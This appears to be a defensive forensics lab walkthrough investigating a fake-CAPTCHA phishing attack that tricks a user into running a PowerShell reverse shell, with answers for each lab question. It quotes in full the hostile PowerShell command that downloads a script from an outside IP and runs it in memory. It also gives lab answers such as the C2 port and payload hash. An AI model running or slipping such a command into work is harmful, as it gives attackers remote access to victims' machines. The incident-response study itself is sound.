Scenario

🛠️ Scenario Overview

An attacker sends a phishing email to the victim, claiming it's an urgent Microsoft Office update. The email includes a link that leads to a malicious website.

Upon visiting the site, the victim is presented with a CAPTCHA. After solving it, they're instructed to paste content from their clipboard into the Windows Run dialog.

A non-technical user falls for the scheme and unknowingly executes a PowerShell payload. This payload downloads and runs a PowerShell script directly in memory—a reverse shell—that gives the attacker remote access to the victim’s machine. How the attack happened

🔍 Provided Evidence

• PCAP File – Network traffic capture

• KAPE Forensic Collection

• Prefetch Files

• Registry Hive

  
  

🧰 Tools Used

• Registry Explorer by Eric Zimmermanhttps://ericzimmerman.github.io/#!index.md

• Wireshark – For analyzing network traffic

• CyberChef – For decoding and analyzing payloadshttps://gchq.github.io/CyberChef/
  

Walkthrough

It is crucial to understand any payloads executed on the system for initial access. Analyzing registry hive for user happy grunwald. What is the full command that was run to download and execute the stager.

Understanding how initial access was achieved is critical in incident response. In this scenario, we analyze the Registry Hive for user Happy Grunwald.

A good starting point in a KAPE dump is to investigate PowerShell or Command Prompt activity. The RecentDocs key can reveal if any malicious files were recently accessed. Based on the scenario, we suspect a browser-based drive-by attack.

Modern browsers typically restrict passing commands directly to PowerShell, but this protection can be bypassed via vulnerabilities in browser plugins or extensions.

Key Registry Path:

Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Malicious Command Found:

powershell -NOP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://43.205.115.44/office2024install.ps1')"

At what time in UTC did the malicious payload execute?

This can be found in conjunction with the registry artifacts and timestamped entries discussed above.

The payload which was executed initially downloaded a PowerShell script and executed it in memory. What is sha256 hash of the script?

Extract the .ps1 file using Wireshark:

1. Go to File → Export Objects → HTTP.

2. Search for the .ps1 extension.

3. Download the file and calculate the hash locally or upload it to VirusTotal.

✅ Answer:579284442094E1A44BEA9CFB7D8D794C8977714F827C97BCB2822A97742914DE

To which port did the reverse shell connect?

If we take the payload from the extracted file we will need to perform some actions in order to make the encoded data readable.

1. Decode from base64

2. Remove null bytes

3. Generic Code Beautify

4. Syntax Highlighter

With the above operations, we are able to decode and format the payload into a human readable form.

✅ Answer: 6969

For how many seconds was the reverse shell connection established between C2 and the victim's workstation?

Looking at the connection over port 6969, we can calculate the time from the initial connection to the tear down.

✅ Answer: 403 seconds

Attacker hosted a malicious Captcha to lure in users. What is the name of the function which contains the malicious payload to be pasted in victim's clipboard?

Searching for our known IP address, paired with filters for the HTTP protocol will shows us at packet 57543 that the user visited a webpage. While we can certainly derive the answer from here by looking through the packet, we can also export this object to visually see what the attackers landing page looked like.

✅ Answer: stageClipboard

✅ Conclusion

This scenario highlights the creativity of modern phishing attacks. Social engineering, clipboard hijacking, and memory-only payloads combine to bypass traditional defenses. Always be cautious with unexpected prompts, especially those involving the Run dialog or PowerShell.

THE END